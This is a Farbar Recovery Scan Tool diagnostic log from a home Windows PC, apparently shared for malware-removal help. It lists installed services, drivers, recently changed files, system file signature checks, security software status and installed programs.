CHR HKLM-x32\...\Chrome\Extension: [jmolcgpienlcieaajfkkdamlngancncm] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2013-06-20]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\Skype for Chromium\skype_chrome_extension.crx [2012-10-02]
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 ACDaemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [113152 2010-03-18] (ArcSoft Inc.)
R2 AllShare Framework DMS; C:\Program Files\Samsung\AllShare Framework DMS\1.3.06\AllShareFrameworkManagerDMS.exe [408184 2012-10-23] (Samsung)
R2 AllShare Play Service; C:\Users\Papa\Documents\AllShare Play\AllShare Play Service.exe [662752 2012-12-20] (Copyright 2012 SAMSUNG)
R2 avast! Antivirus; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [50344 2014-08-12] (AVAST Software)
R2 avast! Firewall; C:\Program Files\Alwil Software\Avast5\afwServ.exe [106488 2014-08-12] (AVAST Software)
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed]
S2 UNS; C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe [2314240 2009-10-01] (Intel Corporation) [File not signed]
S3 aspnet_state; %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [X]
S2 btwdins; C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe [X]
S2 PnkBstrA; C:\Windows\system32\PnkBstrA.exe [X]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 ArcSec; C:\Windows\System32\drivers\ArcSec.sys [312184 2010-09-21] ()
R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [29208 2014-08-12] ()
R1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [28184 2014-08-12] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [79184 2014-08-12] (AVAST Software)
R0 aswNdisFlt; C:\Windows\System32\DRIVERS\aswNdisFlt.sys [448400 2014-08-12] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [93568 2014-08-12] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65776 2014-08-12] ()
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1041168 2014-08-12] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [427360 2014-08-12] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [92008 2014-08-12] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [224896 2014-08-12] ()
R2 atksgt; C:\Windows\System32\DRIVERS\atksgt.sys [314016 2013-01-20] ()
R3 clwvd6; C:\Windows\System32\DRIVERS\clwvd6.sys [41704 2013-10-29] (CyberLink Corporation)
S3 hxsyol; C:\AeriaGames\AuraKingdom\avital\hxsy64.sys [86352 2013-11-27] ()
R1 ISODrive; C:\Program Files (x86)\UltraISO\drivers\ISODrv64.sys [115600 2010-01-29] (EZB Systems, Inc.)
R2 lirsgt; C:\Windows\System32\DRIVERS\lirsgt.sys [43680 2013-01-20] ()
S3 massfilter_hs; C:\Windows\System32\drivers\massfilter_hs.sys [12800 2009-02-03] (ZTE Incorporated)
S0 sptd; C:\Windows\System32\Drivers\sptd.sys [868848 2014-01-04] (Duplex Secure Ltd.)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-21 16:25 - 2014-08-21 16:26 - 00034134 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\FRST.txt
2014-08-19 16:33 - 2014-08-19 16:33 - 00000000 ____D () C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\FRST-OlderVersion
2014-08-17 13:58 - 2014-08-17 14:22 - 03163851 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\Đà Nẵng.pptx
2014-08-16 00:39 - 2014-08-16 00:54 - 111457363 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\p1.flv
2014-08-13 16:38 - 2014-08-07 08:52 - 00526848 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-08-13 16:38 - 2014-08-07 08:46 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-08-12 19:05 - 2014-08-12 19:05 - 00076705 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\Addition.txt
2014-08-12 19:04 - 2014-08-12 19:05 - 00055243 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\FRST.txt
2014-08-12 19:03 - 2014-08-21 16:26 - 00000000 ____D () C:\FRST
2014-08-12 19:02 - 2014-08-19 16:33 - 02101760 _____ (Farbar) C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\FRST64.exe
2014-08-12 19:01 - 2014-08-12 19:01 - 00001005 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\AdwCleaner[S0] - Verknüpfung.lnk
2014-08-12 17:52 - 2010-08-30 08:34 - 00536576 _____ (SQLite Development Team) C:\Windows\SysWOW64\sqlite3.dll
2014-08-12 17:50 - 2014-08-12 17:57 - 00000000 ____D () C:\AdwCleaner
2014-08-12 17:21 - 2014-08-12 17:21 - 01366203 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\AdwCleaner.exe
2014-08-12 16:30 - 2014-08-12 16:30 - 00001987 _____ () C:\Users\Public\Desktop\avast! Internet Security.lnk
2014-08-12 16:30 - 2014-08-12 16:29 - 00028184 _____ (AVAST Software) C:\Windows\system32\Drivers\aswKbd.sys
2014-08-12 16:29 - 2014-08-12 16:29 - 00448400 _____ (AVAST Software) C:\Windows\system32\Drivers\aswNdisFlt.sys
2014-08-12 16:29 - 2014-08-12 16:29 - 00043152 _____ (AVAST Software) C:\Windows\avastSS.scr
2014-08-11 20:39 - 2014-08-11 20:39 - 00000000 ____D () C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Skype
2014-08-11 20:39 - 2014-08-11 20:39 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2014-08-11 20:35 - 2014-08-11 20:35 - 01677928 _____ (Skype Technologies S.A.) C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\SkypeSetup.exe
2014-08-10 00:50 - 2014-08-10 00:51 - 04161313 _____ () C:\Users\Papa\Downloads\tdsskiller.zip
2014-08-10 00:49 - 2014-08-10 00:49 - 04121952 _____ (Kaspersky Lab ZAO) C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\tdsskiller.exe
2014-08-10 00:32 - 2014-08-10 00:32 - 00000000 ____D () C:\ProgramData\F-Secure
2014-08-10 00:25 - 2014-08-10 00:27 - 05124208 _____ (F-Secure Corporation) C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\F-SecureOnlineScanner-HC.exe
2014-08-09 23:57 - 2014-08-09 23:57 - 00148710 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\Extras.Txt
2014-08-09 23:56 - 2014-08-09 23:56 - 00299540 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\OTL.Txt
2014-08-09 23:56 - 2014-08-09 23:56 - 00000000 ____D () C:\Users\Papa\AppData\Local\Apps\2.0
2014-08-09 22:03 - 2014-08-09 22:03 - 00000000 ____D () C:\Users\Papa\Documents\SimCity
2014-08-09 21:45 - 2014-08-09 21:45 - 00000000 ____D () C:\Users\Papa\AppData\Roaming\install
2014-07-26 23:59 - 2014-07-27 00:11 - 663087765 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\The Forest Setup [Project Antx].exe
2014-07-24 02:43 - 2014-07-24 02:43 - 00000000 ____D () C:\ProgramData\Vodafone
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-21 16:26 - 2014-08-21 16:25 - 00034134 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\FRST.txt
2014-08-21 16:26 - 2014-08-12 19:03 - 00000000 ____D () C:\FRST
2014-08-21 16:23 - 2009-07-14 11:45 - 00016112 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-08-21 16:23 - 2009-07-14 11:45 - 00016112 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-08-21 16:19 - 2010-09-18 23:13 - 01906672 _____ () C:\Windows\WindowsUpdate.log
2014-08-21 16:15 - 2014-02-16 17:59 - 00000000 ____D () C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\NhacCuaTui
2014-08-21 16:15 - 2013-09-13 17:11 - 00000000 ____D () C:\Users\PhanCo.FAMILIE-LE-NB\Tracing
2014-08-21 16:14 - 2013-11-23 13:29 - 00000320 _____ () C:\Windows\Tasks\Start Registry Reviver for FAMILIE-LE-NB@PhanCo(logon).job
2014-08-21 16:14 - 2010-11-16 01:47 - 00000982 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-08-21 16:13 - 2009-07-14 12:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-08-21 16:13 - 2009-07-14 11:51 - 00178524 _____ () C:\Windows\setupact.log
2014-08-20 22:39 - 2013-09-15 20:09 - 00000000 ____D () C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\DMCache
2014-08-20 22:36 - 2010-11-16 01:47 - 00000986 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-08-20 22:34 - 2013-12-14 17:24 - 00001028 _____ () C:\Windows\Tasks\CocCocUpdateTaskUserS-1-5-21-4169419405-2626366916-160398126-1007UA.job
2014-08-20 22:25 - 2012-02-22 23:26 - 00000254 _____ () C:\Windows\Tasks\HP Photo Creations Messager.job
2014-08-20 17:34 - 2013-12-14 17:24 - 00000976 _____ () C:\Windows\Tasks\CocCocUpdateTaskUserS-1-5-21-4169419405-2626366916-160398126-1007Core.job
2014-08-20 16:30 - 2012-08-06 21:55 - 00004184 _____ () C:\Windows\System32\Tasks\avast! Emergency Update
2014-08-19 16:46 - 2013-03-28 18:22 - 00000330 __RSH () C:\Users\PhanCo.FAMILIE-LE-NB\ntuser.pol
2014-08-19 16:46 - 2013-03-28 18:22 - 00000000 ____D () C:\Users\PhanCo.FAMILIE-LE-NB
2014-08-19 16:44 - 2010-09-18 23:09 - 00285120 _____ () C:\Windows\PFRO.log
2014-08-19 16:33 - 2014-08-19 16:33 - 00000000 ____D () C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\FRST-OlderVersion
2014-08-19 16:33 - 2014-08-12 19:02 - 02101760 _____ (Farbar) C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\FRST64.exe
2014-08-19 16:33 - 2009-07-14 10:20 - 00000000 ___HD () C:\Windows\system32\GroupPolicy
2014-08-18 21:35 - 2010-09-19 09:05 - 00700930 _____ () C:\Windows\system32\perfh007.dat
2014-08-18 21:35 - 2010-09-19 09:05 - 00153854 _____ () C:\Windows\system32\perfc007.dat
2014-08-18 21:35 - 2009-07-14 12:13 - 01651764 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-08-18 21:26 - 2009-07-14 12:08 - 00032592 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-08-17 14:22 - 2014-08-17 13:58 - 03163851 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\Đà Nẵng.pptx
2014-08-17 14:22 - 2013-06-04 15:53 - 00486400 ___SH () C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\Thumbs.db
2014-08-16 00:54 - 2014-08-16 00:39 - 111457363 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\p1.flv
2014-08-15 23:02 - 2013-04-13 22:12 - 00000000 ___RD () C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\Co's stuff
2014-08-15 22:01 - 2013-07-21 19:17 - 00000000 ____D () C:\Windows\system32\MRT
2014-08-15 21:45 - 2010-11-16 02:37 - 99218768 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-08-15 21:44 - 2014-07-18 20:11 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-08-15 21:44 - 2010-11-20 05:47 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-08-12 19:05 - 2014-08-12 19:05 - 00076705 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\Addition.txt
2014-08-12 19:05 - 2014-08-12 19:04 - 00055243 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\FRST.txt
2014-08-12 19:01 - 2014-08-12 19:01 - 00001005 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\AdwCleaner[S0] - Verknüpfung.lnk
2014-08-12 17:57 - 2014-08-12 17:50 - 00000000 ____D () C:\AdwCleaner
2014-08-12 17:57 - 2010-11-14 18:52 - 00000000 ____D () C:\Users\Papa
2014-08-12 17:21 - 2014-08-12 17:21 - 01366203 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\AdwCleaner.exe
2014-08-12 16:30 - 2014-08-12 16:30 - 00001987 _____ () C:\Users\Public\Desktop\avast! Internet Security.lnk
2014-08-12 16:30 - 2011-01-13 13:28 - 00427360 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsp.sys
2014-08-12 16:29 - 2014-08-12 16:30 - 00028184 _____ (AVAST Software) C:\Windows\system32\Drivers\aswKbd.sys
2014-08-12 16:29 - 2014-08-12 16:29 - 00448400 _____ (AVAST Software) C:\Windows\system32\Drivers\aswNdisFlt.sys
2014-08-12 16:29 - 2014-08-12 16:29 - 00043152 _____ (AVAST Software) C:\Windows\avastSS.scr
2014-08-12 16:29 - 2013-03-25 22:52 - 00224896 _____ () C:\Windows\system32\Drivers\aswVmm.sys
2014-08-12 16:29 - 2013-03-25 22:52 - 00065776 _____ () C:\Windows\system32\Drivers\aswRvrt.sys
2014-08-12 16:29 - 2012-05-17 10:16 - 00093568 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2014-08-12 16:29 - 2011-06-09 21:51 - 01041168 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsnx.sys
2014-08-12 16:29 - 2011-01-13 13:28 - 00307344 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2014-08-12 16:29 - 2011-01-13 13:28 - 00079184 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2014-08-12 16:29 - 2009-01-05 05:40 - 00092008 _____ (AVAST Software) C:\Windows\system32\Drivers\aswstm.sys
2014-08-12 16:29 - 2009-01-05 05:40 - 00029208 _____ () C:\Windows\system32\Drivers\aswHwid.sys
2014-08-11 21:03 - 2013-08-17 00:01 - 00000000 ____D () C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\Skype
2014-08-11 20:39 - 2014-08-11 20:39 - 00000000 ____D () C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Skype
2014-08-11 20:39 - 2014-08-11 20:39 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2014-08-11 20:39 - 2012-06-06 16:29 - 00000000 ___RD () C:\Program Files (x86)\Skype
2014-08-11 20:39 - 2010-11-20 22:26 - 00000000 ____D () C:\ProgramData\Skype
2014-08-11 20:35 - 2014-08-11 20:35 - 01677928 _____ (Skype Technologies S.A.) C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\SkypeSetup.exe
2014-08-10 00:51 - 2014-08-10 00:50 - 04161313 _____ () C:\Users\Papa\Downloads\tdsskiller.zip
2014-08-10 00:49 - 2014-08-10 00:49 - 04121952 _____ (Kaspersky Lab ZAO) C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\tdsskiller.exe
2014-08-10 00:32 - 2014-08-10 00:32 - 00000000 ____D () C:\ProgramData\F-Secure
2014-08-10 00:27 - 2014-08-10 00:25 - 05124208 _____ (F-Secure Corporation) C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\F-SecureOnlineScanner-HC.exe
2014-08-09 23:57 - 2014-08-09 23:57 - 00148710 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\Extras.Txt
2014-08-09 23:56 - 2014-08-09 23:56 - 00299540 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\OTL.Txt
2014-08-09 23:56 - 2014-08-09 23:56 - 00000000 ____D () C:\Users\Papa\AppData\Local\Apps\2.0
2014-08-09 22:03 - 2014-08-09 22:03 - 00000000 ____D () C:\Users\Papa\Documents\SimCity
2014-08-09 21:45 - 2014-08-09 21:45 - 00000000 ____D () C:\Users\Papa\AppData\Roaming\install
2014-08-09 15:30 - 2014-07-18 19:12 - 00002074 _____ () C:\Windows\system32\TeamViewer9_Hooks.log
2014-08-09 15:30 - 2014-06-25 11:01 - 00001025 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 9.lnk
2014-08-09 15:30 - 2014-06-25 11:01 - 00001013 _____ () C:\Users\Public\Desktop\TeamViewer 9.lnk
2014-08-09 15:18 - 2013-09-15 20:09 - 00000000 ____D () C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\IDM
2014-08-07 08:52 - 2014-08-13 16:38 - 00526848 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-08-07 08:46 - 2014-08-13 16:38 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-08-05 16:15 - 2012-05-30 17:11 - 00000000 ____D () C:\Windows\Coole_Schule_6
2014-08-05 09:20 - 2011-01-13 13:49 - 00270496 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-07-27 16:37 - 2013-09-15 20:09 - 00000000 ____D () C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\Compressed
2014-07-27 08:05 - 2013-03-14 17:04 - 00000000 ____D () C:\Program Files\Microsoft Silverlight
2014-07-27 08:05 - 2013-03-14 17:04 - 00000000 ____D () C:\Program Files (x86)\Microsoft Silverlight
2014-07-27 06:03 - 2013-03-14 17:07 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2014-07-27 00:11 - 2014-07-26 23:59 - 663087765 _____ () C:\Users\PhanCo.FAMILIE-LE-NB\Downloads\The Forest Setup [Project Antx].exe
2014-07-25 02:41 - 2013-04-07 13:00 - 00000000 ____D () C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games
2014-07-24 15:19 - 2009-01-12 14:58 - 00000000 ____D () C:\Users\Kenh\Documents\YouCam
2014-07-24 15:18 - 2012-01-17 22:47 - 00113000 _____ () C:\Users\Kenh\AppData\Local\GDIPFONTCACHEV1.DAT
2014-07-24 02:43 - 2014-07-24 02:43 - 00000000 ____D () C:\ProgramData\Vodafone
2014-07-24 02:43 - 2010-11-14 19:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vodafone
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-08-01 20:18
 
==================== End Of Log ============================
 
Addition.txt
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 17-08-2014 01
Ran by Papa at 2014-08-21 16:27:08
Running from C:\Users\PhanCo.FAMILIE-LE-NB\Desktop
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
FW: avast! Antivirus (Enabled) {2F96FC65-F07D-9D1E-5A6E-3DA5C487EAF0}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
µTorrent (HKCU\...\uTorrent) (Version: 3.3.1.30017 - BitTorrent Inc.)
Acer Arcade Deluxe (HKLM-x32\...\InstallShield_{2637C347-9DAD-11D6-9EA2-00055D0CA761}) (Version: 4.0.8012 - CyberLink Corp.)
Acer Arcade Deluxe (x32 Version: 4.0.8012 - CyberLink Corp.) Hidden
Acer Arcade Movie (x32 Version: 9.0.6625 - CyberLink Corp.) Hidden
Acer Backup Manager (HKLM-x32\...\InstallShield_{72B776E5-4530-4C4B-9453-751DF87D9D93}) (Version: 2.0.0.63 - NewTech Infosystems)
Acer Crystal Eye webcam (HKLM-x32\...\{51F026FA-5146-4232-A8BA-1364740BD053}) (Version: 1.0.3.5 - Liteon)
Acer eRecovery Management (HKLM-x32\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 4.05.3013 - Acer Incorporated)
Acer GameZone Console (HKLM-x32\...\{58F4D244-314F-4D26-B5EF-C28AB32E22CB}_is1) (Version: 6.1.0.9 - Oberon Media, Inc.)
Acer PowerSmart Manager (HKLM-x32\...\{3DB0448D-AD82-4923-B305-D001E521A964}) (Version: 5.02.3004 - Acer Incorporated)
Acer Registration (HKLM-x32\...\Acer Registration) (Version: 1.03.3003 - Acer Incorporated)
Acer ScreenSaver (HKLM-x32\...\Acer Screensaver) (Version: 1.1.0222.2010 - Acer Incorporated)
Acer VCM (HKLM-x32\...\{047F790A-7A2A-4B6A-AD02-38092BA63DAC}) (Version: 4.05.3002 - Acer Incorporated)
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe After Effects CC (HKLM-x32\...\{317243C1-6580-4F43-AED7-37D4438C3DD5}) (Version: 12 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.7.0.2090 - Adobe Systems Incorporated)
Adobe AIR (x32 Version: 3.7.0.2090 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 11 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 11.8.800.94 - Adobe Systems Incorporated)
Adobe Flash Player 11 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 11.8.800.94 - Adobe Systems Incorporated)
Adobe Premiere Pro CC (HKLM-x32\...\{505FF1AC-E7F5-4462-BBA7-08900E7E9EEF}) (Version: 7.0.0 - Adobe Systems Incorporated)
Adobe Reader 9.5.5 MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-A91000000001}) (Version: 9.5.5 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1.0.150 - Adobe Systems, Inc.)
Aeria Ignite (HKLM-x32\...\Aeria Ignite 1.13.3296) (Version: 1.13.3296 - Aeria Games & Entertainment)
Aeria Ignite (HKLM-x32\...\Aeria Ignite) (Version: 1.13.3296 - Aeria Games & Entertainment)
Aeria Ignite (x32 Version: 1.13.3296 - Aeria Games & Entertainment) Hidden
Airport Mania First Flight (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11505173}) (Version:  - Oberon Media)
Alcor Micro USB Card Reader (HKLM-x32\...\InstallShield_{5A22D889-FBDD-4AE8-86EC-089D45FC133E}) (Version: 1.2.17.05001 - Alcor Micro Corp.)
Alcor Micro USB Card Reader (x32 Version: 1.2.17.05001 - Alcor Micro Corp.) Hidden
AllShare Framework DMS (HKLM\...\{1ABC9BD2-7E06-4D70-929B-AC1B6461A8B2}) (Version: 1.3.06 - Samsung)
AllShare Play 1.5.0.1212201836 (HKLM\...\8474-7877-9059-0204) (Version: 1.5.0.1212201836 - Copyright 2012 SAMSUNG)
Amazonia (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11273477}) (Version:  - Oberon Media)
ANNO 1404 (HKLM-x32\...\{3D9CF3CA-3AB0-4A82-9853-D7C43FD1D775}) (Version: 1.00.0000 - Ubisoft)
Anno 1404 (x32 Version: 1.00.0000 - Ubisoft) Hidden
Apple Application Support (HKLM-x32\...\{D9DAD0FF-495A-472B-9F10-BAE430A26682}) (Version: 3.0.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{787136D2-F0F8-4625-AA3F-72D7795AC842}) (Version: 7.1.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
AppTrans 1.7.0 (HKLM-x32\...\{F0B50B3A-0C1F-43D8-BE9A-70ADFB473114}}_is1) (Version: 1.7.0 - iMobie Inc.)
ArcSoft Panorama Maker 5 (HKLM-x32\...\{F18046C5-1C4E-4BE1-A3D6-A6F970E2E8E8}) (Version: 5.0.1.25 - ArcSoft)
ArcSoft TotalMedia Theatre 5 (HKLM-x32\...\InstallShield_{9A2CE5D4-0A1E-42EB-9CE0-ABD5DD79E94E}) (Version: 5.0.1.87 - ArcSoft)
ArcSoft TotalMedia Theatre 5 (x32 Version: 5.0.1.87 - ArcSoft) Hidden
ArtMoney SE v7.41 (HKLM-x32\...\ArtMoney SE_is1) (Version: 7.41 - System SoftLab)
Atheros Communications Inc.® AR81Family Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.0.23 - Atheros Communications Inc.)
ATI Catalyst Install Manager (HKLM\...\{F5816A09-786E-C91D-3D99-8A8C92648750}) (Version: 3.0.765.0 - ATI Technologies, Inc.)
Aura Kingdom (HKLM-x32\...\Aura Kingdom) (Version:  - )
avast! Internet Security (HKLM-x32\...\avast) (Version: 9.0.2021 - AVAST Software)
Backup Manager Basic (x32 Version: 2.0.0.63 - NewTech Infosystems) Hidden
Battlefield 2™ (HKLM-x32\...\{04858915-9F49-4B2A-AED4-DC49A7DE6A7B}) (Version:  - )
BF2 Editor (HKLM-x32\...\{24E85B9C-6E60-4723-89CC-71B66881A020}) (Version: 1.00.0000 - Digital Illusions)
BF2ALL64 (HKLM-x32\...\BF2ALL64) (Version:  - )
Bing Bar (HKLM-x32\...\{08234a0d-cf39-4dca-99f0-0c5cb496da81}) (Version: 6.3.2291.0 - Microsoft Corporation)
Bing Bar Platform (x32 Version: 6.3.2291.0 - Microsoft Corporation) Hidden
Bing Rewards Client Installer (x32 Version: 16.0.345.0 - Microsoft Corporation) Hidden
Blitzkrieg 2 (HKLM-x32\...\Blitzkrieg 2) (Version:  - )
Bluetooth OBEX File Transfer (HKLM-x32\...\{D75BB2DA-5078-4922-81CD-17736A2D888B}) (Version: 1.2.1.1 - Medieval Software)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Cake Mania (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111199750}) (Version:  - Oberon Media)
Call of Duty® 2 (HKLM-x32\...\InstallShield_{D0A05794-48C2-4424-A15A-9F20FCFDD374}) (Version: 1.00.0000 - Activision)
Call of Duty® 2 (x32 Version: 1.00.0000 - Activision) Hidden
Call of Duty® 2 Demo (HKLM-x32\...\InstallShield_{FB9CDF41-F0B9-4F31-9230-7DF0D6637270}) (Version:  - )
Call of Duty® 2 Demo (x32 Version:  - ) Hidden
CamStudio 2.7.2 (HKLM\...\{04B83666-3A62-452B-85D3-70F8117F2329}_is1) (Version: 2.7.2 - CamStudio Open Source)
Catalyst Control Center - Branding (x32 Version: 1.00.0000 - ATI) Hidden
Catalyst Control Center Core Implementation (x32 Version: 2010.0421.657.10561 - ATI) Hidden
Catalyst Control Center Graphics Full Existing (x32 Version: 2010.0421.657.10561 - ATI) Hidden
Catalyst Control Center Graphics Full New (x32 Version: 2010.0421.657.10561 - ATI) Hidden
Catalyst Control Center Graphics Light (x32 Version: 2010.0421.657.10561 - ATI) Hidden
Catalyst Control Center Graphics Previews Vista (x32 Version: 2010.0421.657.10561 - ATI) Hidden
Catalyst Control Center InstallProxy (x32 Version: 2010.0421.657.10561 - ATI Technologies, Inc.) Hidden
Catalyst Control Center Localization All (x32 Version: 2010.0421.657.10561 - ATI) Hidden
CCC Help Chinese Standard (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Chinese Traditional (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Czech (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
